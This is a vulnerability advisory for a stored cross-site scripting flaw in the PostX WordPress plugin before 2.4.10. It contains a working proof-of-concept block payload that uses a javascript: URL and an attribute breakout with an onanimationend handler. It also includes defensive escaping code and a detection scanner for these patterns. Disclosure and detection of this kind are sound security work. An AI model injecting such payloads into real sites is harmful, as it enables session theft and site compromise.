WordPress Plugin Vulnerabilities
PostX Gutenberg Blocks for Post Grid < 2.4.10 - Contributor+ Stored Cross-Site Scripting
Description
The plugin allows users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks via the plugin's block.
Proof of Concept
The PoC can be entered via the block code editor. The example below uses the Taxonomy block; all of the plugin's blocks are vulnerable:
<!-- wp:ultimate-post/ultp-taxonomy {"blockId":"767f9c","headingURL":"javascript:alert(origin)","counterBgColor":{"openColor":1,"type":"color","color":"","gradient":{"color1":"#16d03e","color2":"#1f91f3","type":"linear","direction":"90","start":5,"stop":80,"radial":"center","clip":false},"clip":false},"counterBorder":{"width":{"top":1,"right":1,"bottom":1,"left":1},"type":"solid","color":"#009fd4","openBorder":0},"contentWrapBorder":{"width":{"top":1,"right":1,"bottom":1,"left":1},"type":"solid","color":"#009fd4","openBorder":0},"contentWrapShadow":{"inset":"","width":{"top":1,"right":1,"bottom":1,"left":1},"color":"#009fd4","openShadow":0},"wrapBg":{"openColor":0,"type":"color","color":"#f5f5f5","gradient":{"color1":"#16d03e","color2":"#1f91f3","type":"linear","direction":"90","start":5,"stop":80,"radial":"center","clip":false},"clip":false},"wrapBorder":{"width":{"top":1,"right":1,"bottom":1,"left":1},"type":"solid","color":"#009fd4","openBorder":0},"wrapShadow":{"inset":"","width":{"top":1,"right":1,"bottom":1,"left":1},"color":"#009fd4","openShadow":0},"advanceId":"\u0022 style=\u0022animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(origin)//"} /-->
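The PoC abuses two block attributes: `headingURL` carries a `javascript:` URL, and `advanceId` contains a `"` that closes the id attribute early and appends an event handler. As an added example (not the plugin's code; the heading markup and the `headingText` attribute are assumptions), the block below shows a renderer that escapes `advanceId` for attribute context and allowlists the scheme of `headingURL`, so both PoC values render inert, plus a scan over saved post content that flags those two patterns inside stored block comments.

```javascript
// Added example (not the plugin's code): escape block attributes before they
// reach HTML, and scan stored block comments for the two patterns in the PoC.
const ALLOWED_SCHEMES = ['http:', 'https:'];

// Attribute-context escape. Neutralises the `"` that the PoC's advanceId uses
// to close id="" early and smuggle in style/onanimationend attributes.
function escAttr(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;',
  }[c]));
}

// URL allowlist: keeps relative and http(s) URLs, rejects javascript: and any
// other scheme. Returns '' so the caller emits no link at all.
function safeUrl(raw) {
  const s = String(raw).trim();
  try {
    const u = new URL(s, 'https://example.invalid/'); // base lets relatives parse
    return ALLOWED_SCHEMES.includes(u.protocol) ? s : '';
  } catch { return ''; }
}

// Hypothetical heading renderer for the Taxonomy block (markup is assumed,
// not taken from the plugin). Every attribute value passes through an escaper.
function renderHeading(attrs) {
  const id = attrs.advanceId ? ` id="${escAttr(attrs.advanceId)}"` : '';
  const href = safeUrl(attrs.headingURL || '');
  const text = escAttr(attrs.headingText || 'Taxonomy');
  return href
    ? `<h2${id}><a href="${escAttr(href)}">${text}</a></h2>`
    : `<h2${id}>${text}</h2>`;
}

// Detection over saved post_content: parse each ultimate-post block comment's
// JSON and flag javascript: URLs or quote/angle characters in advanceId.
function scanBlocks(postContent) {
  const findings = [];
  const re = /<!--\s*wp:ultimate-post\/(\S+)\s+(\{[\s\S]*?\})\s*\/?-->/g;
  for (const m of postContent.matchAll(re)) {
    let attrs;
    try { attrs = JSON.parse(m[2]); } catch { continue; }
    for (const [k, v] of Object.entries(attrs)) {
      if (typeof v !== 'string') continue;
      if (/^\s*javascript:/i.test(v)) findings.push({ block: m[1], attr: k, why: 'javascript-url' });
      if (k === 'advanceId' && /["'<>]/.test(v)) findings.push({ block: m[1], attr: k, why: 'attr-breakout' });
    }
  }
  return findings;
}
```

Running `scanBlocks` over `post_content` rows is a quick way to find posts that already carry such payloads on a site that was exposed before updating to 2.4.10.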
Classification
Type
XSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
Timeline
Publicly Published
2021-08-26
Added
2021-08-26
Last Updated
2022-04-11